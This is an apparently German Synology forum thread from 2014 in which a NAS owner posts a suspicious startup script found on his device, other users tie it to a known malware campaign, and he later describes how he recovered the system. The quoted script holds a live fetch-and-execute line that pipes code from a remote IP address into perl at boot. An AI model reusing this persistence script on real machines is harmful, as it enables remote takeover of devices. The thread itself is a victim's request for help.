PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : "S22DiskStation" im "Startup"-Ordner



Oli28
05.04.2014, 16:02
Hallo zusammen

Seit einer Weile komme ich nicht mehr auf das Webinterface der Synology (siehe hier: http://www.synology-forum.de/showthread.html?52613-DS1010-Startet-nicht-mehr-nur-noch-quot-System-wird-vorbereitet..-quot&p=418558#post418558)

Jetzt habe ich im startup-Ordner auf der Synology eine Datei mit dem Namen S22DiskStation gefunden. Google weiss nicht allzuviel dazu. Darin ist folgendes:


#!/bin/sh
#
#
# Stop myself if running
PIDFILE=/var/run/DiskStation.pid
#
start() {
nohup curl http://178.254.21.142/start.pl | perl --
# write pidfile
echo $! > $PIDFILE
echo "Optware startup myscript"
}
#
stop() {
[ -f ${PIDFILE} ] && kill -9 0
# remove pidfile
rm -f $PIDFILE
echo "Optware shutdown myscript"
}
#
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
stop
sleep 1
start
;;
*)
echo "Usage: $0 (start|stop|restart)"
exit 1
;;
esac
# End


Was zum Teufel hab ich mir da eingefangen?

ottosykora
05.04.2014, 16:30
huuuh, was ich da so gerade lese in anderen Quellen:
https://www.facebook.com/synology/posts/10152007533142897

http://forum.synology.com/enu/viewtopic.php?f=19&t=80857&p=303732#p303732

Oli28
05.04.2014, 16:42
Ich hab das File rauskopiert, jetzt kommt die DSM gar nicht mehr online, lässt sich nicht pingen und auch im Synology Assistand nicht mehr..

Edit: Doch, wieder da! Aber wie kann ich SSH aktivieren wenn ich nicht drauf komme?

ottosykora
08.04.2014, 10:33
nur Frage: hattest du mittlerweile Erfolg bei der Reinigung?

Oli28
08.04.2014, 15:15
Nein.. Hast Du das gleiche Problem? Meine Lösung im Moment: Backupen (viel Spass bei einem DS1010+) und dann neu aufsetzen :(

Leider bin ich sonst mit meinem Latein am Ende. Aber ich würde mich über Inputs freuen!

Puppetmaster
08.04.2014, 15:23
Den Thread hier (http://www.synology-forum.de/showthread.html?50468-Aktive-Hackangriffe-auf-DSM-Versionen-kleiner-4.3.-3810-Update-3&highlight=bitcoin) kenn ihr aber, oder?

Oli28
08.04.2014, 15:27
Ich nicht, nein. Der hat aber nicht direkt mit "S22DiskStation" zu tun oder? Ich schau den mal durch.

Im Moment komme ich vorallem per SSH nicht drauf, da das nicht aktiviert ist und ich nicht ins Webinterface komme, da gibt es keine andere Lösung oder?

ottosykora
09.04.2014, 08:42
Den Thread hier (http://www.synology-forum.de/showthread.html?50468-Aktive-Hackangriffe-auf-DSM-Versionen-kleiner-4.3.-3810-Update-3&highlight=bitcoin) kenn ihr aber, oder?

wir kennen den wohl beide nicht, schade dass bis jetzt die in dem Thread angebrachten Wünsche nach einem Unterforum 'Sicherheit' oder so ähnlich nicht realisiert wurden.

Das hier ist eben etwas schwer zu finden wenn man nicht genau weiss nach was man sucht.

@Oli28
ja das hat damit zu tun, die Variationen dieser Malware sind wohl mittlerweile unterschiedlich.

Oli28
09.04.2014, 13:10
Hmm, dann warte ich noch auf eine Antwort betreffend meiner Frage hier http://www.synology-forum.de/showthread.html?50468-Aktive-Hackangriffe-auf-DSM-Versionen-kleiner-4.3.-3810-Update-3&p=419902#post419902

Lg
Oli

Oli28
12.04.2014, 16:19
Das Problem bis zum Schluss war: Ich hatte keinen Zugriff auf das Webinterface der DS. Der Synology Assistent kam nie über "Dienste werden gestartet" raus. Der Resetknopf hat ansich nichts am Problem gelöst, das Passwort wurde zurück gesetzt, die fixe IP ebebenfalls aber immernoch kein Zugriff auf das Webinterface.

Die Lösung:
- Alle Festplatten entfernen und eine, neue, einbauen. Ich hatte noch eine rum liegen.. (Das Starten mir nur einer Platte brachte in diesem Zustand nichts)
- Die DS mit dem Synology Assistent neu aufsetzen.
- Dann wieder die alten Platten einbauen (ev. mal nur eine, es könnte ja auch die Platte defekt sein)
- Dann kann mit dem Synology Assistent von der alten, jetzt eingebauten Platte "migriert" werden.
- Danach sind alle Daten wieder vorhanden und die DS läuft wieder wunderbar, ich hoffe das kann dem Nächsten helfen

Lg
Olivier

Puppetmaster
12.04.2014, 16:47
Der Resetknopf hat ansich nichts am Problem gelöst, das Passwort wurde zurück gesetzt, die fixe IP ebebenfalls aber immernoch kein Zugriff auf das Webinterface.

Du hast aber schon den doppelten Reset (http://www.synology-wiki.de/index.php/Durchf%C3%BChrung_eines_Reset_am_Geh%C3%A4use#Neui nstallation_der_Firmware) wie im HowTo beschrieben versucht, und nicht nur das einmalige Drücken des Knopfes?

Oli28
12.04.2014, 17:19
Jep, 4sek gedrückt halten und dann nach dem Signalton nochmals 4sek innherhalb von 10sek oder?

Puppetmaster
12.04.2014, 18:08
Ja, genau.

Oli28
12.04.2014, 18:38
Das hab ich gemacht, ja.

ottosykora
13.04.2014, 13:10
das müsste man irgednwo 'sticky' ablegen, ist wirklich wertvoll